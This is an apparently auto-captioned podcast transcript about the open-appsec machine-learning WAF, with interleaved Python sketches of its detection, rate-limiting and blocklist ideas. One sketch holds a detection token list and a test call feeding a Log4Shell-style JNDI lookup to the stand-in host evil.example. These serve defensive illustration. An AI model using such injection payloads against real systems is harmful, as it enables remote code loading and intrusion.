Today's Deep-Dive: open-appsec
Ep. 267

Episode description

This deep dive discusses open-appsec, a machine learning engine designed to revolutionize web application and API security. It aims to shift from reactive fixes to preemptive protection against major threats, including zero-day vulnerabilities. The system uses a two-phase approach: a supervised global model for known attack patterns and an unsupervised local model for real-time, application-specific learning. This dual-engine process ensures precise threat detection by understanding both global attack indicators and local application behaviors. The engine also includes comprehensive security layers such as API security, intrusion prevention, anti-bot capabilities, file security, and advanced rate limiting. It is designed for modern infrastructures, supporting cloud-native and CI/CD environments, and is open-source under the Apache 2.0 license. The technology promises to reduce the operational overhead of security teams, allowing them to focus on higher-level strategy. The page concludes by posing a thought-provoking question about the future role of security analysts in an era of preemptive, self-learning security solutions.

0:00

Welcome to the deep dive, your shortcut to getting up to speed quickly. Today, our

0:04

mission is really focused

0:05

We're tackling one of the biggest headaches in digital security keeping web apps

0:08

and APIs safe.

0:09

We are diving deep into the sources around open-appsec.

0:12

It's a machine learning engine and the promise here is pretty big fundamentally

0:16

changing web defense moving security away from you know

0:20

Reactive fixes towards automatic preemptive protection against the big stuff like

0:24

the OWASP Top 10 and, yeah,

0:26

even zero-days. Now, before we jump right in, just a quick word: this deep dive is

0:31

supported by Safeserver.

0:32

They handle software hosting and can support you through your digital

0:35

transformation. You can find out more about them at

0:37

www.safeserver.de

0:39

Okay, let's get into it. If you're in tech,

0:42

you probably know the pain of the traditional web application firewall, the WAF

0:46

that sits in front of your app. And historically,

0:48

managing it is a constant battle: hours writing signatures and exceptions, dealing with

0:52

false positives. Yeah, that's exactly the context

0:55

The source material really positions open-appsec as, well, the opposite of that high-maintenance

1:01

reality

1:02

They define it pretty simply a machine learning security engine one that

1:06

automatically and crucially preemptively

1:09

stops threats against web apps and APIs.

1:11

The core idea isn't just catching known bad stuff

1:15

It's about learning what normal looks like for your specific application and that's

1:19

the bit that really grabs your attention, right?

1:21

Painless to configure and manage, effective security, and it's open source. Honestly,

1:25

knowing the usual operational grind that almost sounds well

1:28

Too good to be true. Well, the claim really rests on two core ideas. They hammer

1:32

home

1:32

preemptive and precise

1:35

Preemptive means it acts without needing those constant signature updates. This is

1:39

where those pretty startling claims come in

1:41

They state it blocked major zero-days like Log4Shell and Spring4Shell with no

1:46

prior knowledge. No updates needed

1:48

That's well, that's a huge deal. Wow. Okay, if that holds water, it means the

1:52

system isn't just matching patterns

1:54

It's understanding the attack's intent somehow. Precisely. Yeah, and that links

1:58

directly to the second idea

1:59

precision

2:02

Because the machine learning is continuously adapting to your environment. It

2:05

supposedly cuts down

2:06

Drastically on the noise, you know the false positives the endless exceptions that

2:11

make old-school WAFs such a chore.

2:13

Okay. So before we get into the ML engine itself the sort of brain of the operation

2:17

what happens first when a request comes in?

2:19

What's the groundwork? Right? It needs to fully understand the data first which can

2:23

be tricky

2:24

So for every single HTTP request the engine starts by decoding everything all the

2:29

parts of the payload

2:30

It pulls out any nested data specifically looking for JSON or XML sections hidden

2:34

inside

2:35

Only after it's fully parsed and understood the raw request and applied basic IP

2:40

checks

2:40

Then the machine learning part kicks in. Got it. So let's unpack that core

2:44

intelligence
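
The decoding step described here can be illustrated with a small Python sketch. It is only an assumption about the general technique (recursively unwrapping JSON and URL-encoding until plain values remain), not open-appsec's actual parser; the function names and the depth limit are hypothetical, and XML handling is left out for brevity.

```python
import json
from urllib.parse import unquote_plus


def _walk_json(node, depth: int, max_depth: int) -> list[str]:
    """Collect leaf values from a parsed JSON structure."""
    if isinstance(node, dict):
        node = list(node.values())
    if isinstance(node, list):
        leaves: list[str] = []
        for item in node:
            leaves.extend(_walk_json(item, depth, max_depth))
        return leaves
    if isinstance(node, str):
        # A string leaf may itself hide another encoded layer.
        return extract_values(node, depth, max_depth)
    return [str(node)]


def extract_values(raw: str, depth: int = 0, max_depth: int = 5) -> list[str]:
    """Return the decoded leaf values hidden inside a request field.

    Hypothetical helper: unwraps nested JSON and URL-encoding, stopping at
    max_depth so a hostile payload cannot force unbounded recursion.
    """
    if depth >= max_depth:
        return [raw]
    text = raw.strip()
    if text[:1] in ("{", "["):
        try:
            parsed = json.loads(text)
        except ValueError:
            parsed = None  # not valid JSON after all; fall through
        if parsed is not None:
            return _walk_json(parsed, depth + 1, max_depth)
    decoded = unquote_plus(text)
    if decoded != text:
        return extract_values(decoded, depth + 1, max_depth)
    return [text]


# A JSON body whose "filter" field is itself JSON with a URL-encoded value.
inner = json.dumps({"q": "1%27%20OR%201%3D1"})
body = json.dumps({"user": "alice", "filter": inner})
values = extract_values(body)
```

Only once the innermost values are exposed like this does it make sense to score them, which matches the order the speakers describe: parse first, then hand over to the machine learning part.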

2:45

The sources talk about a two-phase dual engine process not just one big AI model.

2:50

How does it figure out good versus bad?

2:51

Yeah, it's clever. It combines

2:53

Global knowledge with very specific local context. The main goal is spotting

2:59

requests that just don't fit the normal pattern

3:02

Things that fall outside how users should be interacting with the application. Okay

3:06

phase one

3:06

That's the supervised model the global schooling part. That's a great way to think

3:10

about it

3:11

Yeah, the supervised model is like the global expert

3:14

It's trained offline on a massive data set millions of requests both malicious

3:19

attack traffic and perfectly normal benign traffic

3:22

collected from all over

3:24

Think of it as the system's baseline understanding of known attack types seen

3:28

across the Internet

3:29

What kind of data does it look at? It considers a whole range of things:

3:33

known attack indicators, the IP's reputation, user agents, browser fingerprints, other

3:37

sort of contextual clues

3:39

It does a quick comparison does this incoming request look like any known global

3:43

attack patterns

3:44

The sources mention there's a basic model for, say, testing or monitoring only,

3:48

but the advanced model

3:50

The one they recommend for production gets updated via their portal. It keeps

3:53

learning globally

3:54

Okay, so the supervised model acts as a first filter

3:57

It lets the obviously good stuff through and flags the clearly bad based on global

4:02

patterns. But what about the gray area stuff?

4:05

That looks suspicious globally, but might be okay locally. That's where phase two

4:09

comes in. Exactly

4:10

That's the handoff if phase one says hmm

4:13

This looks risky or suspicious then the analysis moves to the unsupervised model

4:18

and this one is completely different

4:20

It's the local detective. It doesn't use that global training data instead

4:24

It builds its intelligence in real time right there in your protected environment.

4:28

Ah, okay

4:28

So it's learning the specific quirks and patterns of my application my users

4:33

I see it looks at hyper local context things like the exact URL being hit the usual

4:37

traffic patterns for that specific endpoint

4:39

Maybe the history of the user involved it uses this local perspective to generate a

4:43

final confidence score and that score decides

4:45

Block or allow it's that blend the global knowledge of attacks plus the specific

4:50

understanding of your applications behavior

4:52

That's supposed to deliver that promised precision. Interesting.
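
The two-phase handoff described above can be sketched in a few lines of Python. Everything here is a stand-in under stated assumptions: the token list is a toy substitute for the trained supervised model, payload-length statistics are a toy substitute for the unsupervised local model, and the equal weighting and the 0.6 threshold are arbitrary. None of the names come from open-appsec.

```python
from dataclasses import dataclass, field
from statistics import mean, pstdev

# Toy stand-in for the globally trained supervised model (assumption).
SUSPICIOUS_TOKENS = ("${jndi:", "<script", "' or ", "../")


def global_score(payload: str) -> float:
    """Phase 1: score a payload against known global attack indicators."""
    lowered = payload.lower()
    hits = sum(token in lowered for token in SUSPICIOUS_TOKENS)
    return min(1.0, hits / 2)


@dataclass
class LocalBaseline:
    """Phase 2: learns what is normal per URL (here only payload length)."""

    lengths: dict[str, list[int]] = field(default_factory=dict)

    def learn(self, url: str, payload: str) -> None:
        self.lengths.setdefault(url, []).append(len(payload))

    def anomaly(self, url: str, payload: str) -> float:
        seen = self.lengths.get(url, [])
        if len(seen) < 5:
            return 0.5  # too little local history, stay neutral
        spread = pstdev(seen) or 1.0
        z = abs(len(payload) - mean(seen)) / spread
        return min(1.0, z / 4)


def decide(url: str, payload: str, baseline: LocalBaseline,
           threshold: float = 0.6) -> str:
    """Allow clean traffic in phase 1; send suspicious traffic to phase 2."""
    g = global_score(payload)
    if g == 0.0:
        baseline.learn(url, payload)  # only clean traffic shapes the baseline
        return "allow"
    confidence = 0.5 * g + 0.5 * baseline.anomaly(url, payload)
    return "block" if confidence >= threshold else "allow"


baseline = LocalBaseline()
for query in ["shoes", "boots", "socks", "hats", "coats", "scarf"]:
    decide("/search", query, baseline)
verdict = decide("/search", "${jndi:ldap://evil.example/a}", baseline)
```

The point of the sketch is the control flow: a request that looks suspicious globally is not blocked outright, it is re-scored against what this particular endpoint normally receives.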

4:55

So moving beyond just the core ML engine the sources indicate this isn't just a

5:00

simple filter even with the two phases

5:01

What other security layers are built in? It sounds like a suite. It really is

5:05

presented as a comprehensive stack

5:07

Yeah, bundled into one engine. A big one for modern setups is API security.

5:11

The engine apparently discovers your APIs automatically and helps narrow the

5:15

attack surface

5:16

It can enforce strict OpenAPI schema validation, making sure the API calls actually

5:21

look like they're supposed to

5:23

Exactly making sure the traffic fits the expected format and what about protection

5:27

against, you know standard known vulnerabilities

5:30

We still need that right? Absolutely, and that's integrated too. There's an

5:33

enhanced intrusion prevention system, an IPS. This protects against,

5:37

I think the number was over 2,800

5:39

specific web CVEs known vulnerabilities

5:42

It uses NSS-certified tech and an open Snort 3.0 engine. So you get this smart ML

5:48

detection and strong defense against known exploits

5:50

Best of both worlds supposedly. Okay makes sense. What else bots are a huge problem.

5:56

Yep covered. They include anti-bot capabilities

5:58

designed to identify and stop automated attacks, scrapers,

6:02

intrusion attempts before they cause damage. Right, that handles incoming traffic

6:06

threats

6:07

But what about uploads malicious files are a classic vector. Good point. They've

6:12

built in file security

6:13

It scans uploaded files automatically and it checks them against a big cloud

6:17

repository for known malicious file reputations

6:20

Helps stop nasty executables or scripts getting onto your servers. Hmm, I saw a

6:25

mention of some pretty

6:26

advanced rate limiting controls, more than just blocking IPs. Yeah, the rate

6:30

limiting seems quite flexible

6:32

You can set limits based not just on IP address

6:34

but on identifiers inside the session like, you know, specific keys found in JWTs,

6:39

JSON Web Tokens, or maybe values in cookies or custom headers.

6:42

That's really useful for protecting individual user accounts or API keys from brute

6:46

force or abuse. That is more granular
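
To make the idea of limiting by session identifier rather than by IP concrete, here is a minimal Python sketch. It is an illustration under assumptions, not open-appsec configuration: the class and function names, the `X-Api-Key` header, and the choice of the `sub` claim are all hypothetical. Note that the JWT payload is read without verifying the signature, which is acceptable only for picking a rate-limit key and never for authentication.

```python
import base64
import json
import time
from collections import defaultdict, deque


def jwt_claim(token: str, claim: str):
    """Read one claim from a JWT payload WITHOUT verifying the signature."""
    try:
        payload_b64 = token.split(".")[1]
        padded = payload_b64 + "=" * (-len(payload_b64) % 4)
        return json.loads(base64.urlsafe_b64decode(padded)).get(claim)
    except (IndexError, ValueError, AttributeError):
        return None  # malformed token: caller falls back to another key


def rate_limit_key(headers: dict, client_ip: str) -> str:
    """Prefer a per-user or per-API-key identifier, fall back to the IP."""
    auth = headers.get("Authorization", "")
    if auth.startswith("Bearer "):
        subject = jwt_claim(auth[len("Bearer "):], "sub")
        if subject is not None:
            return f"jwt-sub:{subject}"
    api_key = headers.get("X-Api-Key")  # hypothetical custom header
    if api_key:
        return f"api-key:{api_key}"
    return f"ip:{client_ip}"


class SlidingWindowLimiter:
    """Allow at most `limit` requests per key in any `window` seconds."""

    def __init__(self, limit: int, window: float):
        self.limit = limit
        self.window = window
        self.hits = defaultdict(deque)

    def allow(self, key: str, now=None) -> bool:
        now = time.monotonic() if now is None else now
        recent = self.hits[key]
        while recent and now - recent[0] >= self.window:
            recent.popleft()  # drop requests that left the window
        if len(recent) >= self.limit:
            return False
        recent.append(now)
        return True
```

Keyed this way, one abusive account is throttled even when its requests arrive from many IP addresses, and other users behind the same shared IP are unaffected.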

6:48

Definitely. And one more interesting feature: crowd wisdom. They partner with

6:53

CrowdSec.

6:53

This means the system gets real-time threat intelligence from I think it's over 64,000

7:00

contributing servers

7:01

So if an IP address starts attacking applications elsewhere on the network

7:05

Your system can learn about it almost instantly and block it proactively kind of a

7:08

neighborhood watch for servers
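
The neighborhood-watch idea boils down to checking each client address against a shared, regularly refreshed blocklist. The Python sketch below shows only that lookup, using the standard `ipaddress` module; the `SharedBlocklist` class is hypothetical, the addresses are documentation ranges, and how the list is actually fetched from CrowdSec is deliberately not shown.

```python
import ipaddress


class SharedBlocklist:
    """Holds IPs and CIDR ranges reported by other servers (hypothetical)."""

    def __init__(self):
        self.networks = set()

    def update(self, entries):
        """Merge new entries; a single IP becomes a one-address network."""
        for entry in entries:
            self.networks.add(ipaddress.ip_network(entry, strict=False))

    def is_blocked(self, ip: str) -> bool:
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in self.networks)


blocklist = SharedBlocklist()
blocklist.update(["198.51.100.23", "203.0.113.0/24"])
```

A production setup would likely use a prefix tree instead of a linear scan, but the behavior is the same: an address reported elsewhere is refused before it ever reaches the application.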

7:10

Okay, let's circle back to those zero-day claims because that's really the headline

7:14

grabber: blocking Log4Shell without a signature.

7:17

How do the sources justify that confidence? It still sounds almost magical. The

7:21

justification comes back to that unsupervised model, the anomaly detection part.

7:24

Because it learns normal so well anything drastically outside that norm gets flagged

7:30

even if the specific attack method has never been seen before.

7:32

The sources specifically list Log4Shell, Spring4Shell, also Text4Shell, that Apache

7:39

Text vulnerability,

7:40

CVE-2022-42889, and they even mentioned a tricky WAF bypass technique using JSON

7:47

syntax hidden in SQL injection payloads

7:49

In each case the argument is the system saw behavior or request structures that

7:54

were just weird

7:55

Highly anomalous compared to the learned baseline for that application. So it got

7:58

blocked regardless of the specific attack signature, right?

8:01

It's not matching a known bad pattern. It's spotting not normal. Okay, so thinking

8:06

about implementation if I'm running modern infrastructure cloud

8:08

containers, CI/CD pipelines, how does this fit in? If the goal is painless, it can't

8:13

involve tearing everything down?

8:14

No, it seems designed explicitly for that. It's described as cloud-native and CI/CD

8:20

friendly

8:21

You can deploy it using declarative methods like infrastructure as code or manage

8:25

it via APIs.

8:26

Platform wise it usually works as an add-on

8:29

You can deploy it with Linux Docker Kubernetes setups and it integrates with common

8:33

reverse proxies: NGINX, Kong, APISIX,

8:37

Envoy.

8:38

The usual suspects. And management flexibility? Different teams have different

8:42

preferences. Seems like it.

8:44

You can use declarative config files, Kubernetes Helm charts, or annotations for that

8:48

automated k8s workflow

8:49

Or they offer a SaaS web interface for managing it visually. So, options depending on

8:53

your operational style

8:54

Good good. And finally that open source aspect. That's pretty important for trust,

8:57

especially with security tools. Absolutely crucial

9:00

It's under the Apache 2.0 license. The core engine code is available

9:04

What's interesting architecturally is they seem to have separated the main logic

9:07

which is mostly C++, from the bits that connect to the web server,

9:11

the attachment, in C, and the part that syncs learning data between agents, smart sync,

9:15

in Go.

9:16

that modularity helps with auditing and critically the sources highlight an

9:20

independent third-party security audit was done on the code back in

9:24

2022. That definitely helps build confidence. Okay, this has been a really

9:28

insightful dive

9:29

We've traced the shift haven't we from those brittle signature based rules needing

9:34

constant tweaking, that high-maintenance WAF job,

9:36

Towards something self-learning adaptive focused on preemptive defense

9:41

The big takeaway here seems to be about changing the operational overhead of

9:44

application security

9:46

Moving away from endless manual tuning lets security teams maybe focus on higher-level

9:50

strategy

9:51

It really could shift the focus and that leads to a really interesting question for

9:56

you the listener to think about

9:57

If this kind of technology truly becomes an install and forget solution one that

10:02

learns continuously and defends preemptively

10:05

What does that mean for the future role of the security analyst?

10:09

Particularly the ones whose main job today is that constant monitoring and fine-tuning

10:14

of complex security policies

10:15

That's the potential strategic shift to consider in your own planning a really

10:19

provocative thought to end on think about how that might change things

10:23

In your own environment or career. Thank you for joining us for this deep dive

10:26

And thanks once again to our sponsor Safeserver for making this exploration

10:30

possible

10:31

Remember to check out how they can support your software hosting and digital

10:34

transformation at

10:35

Join us next time on the deep dive
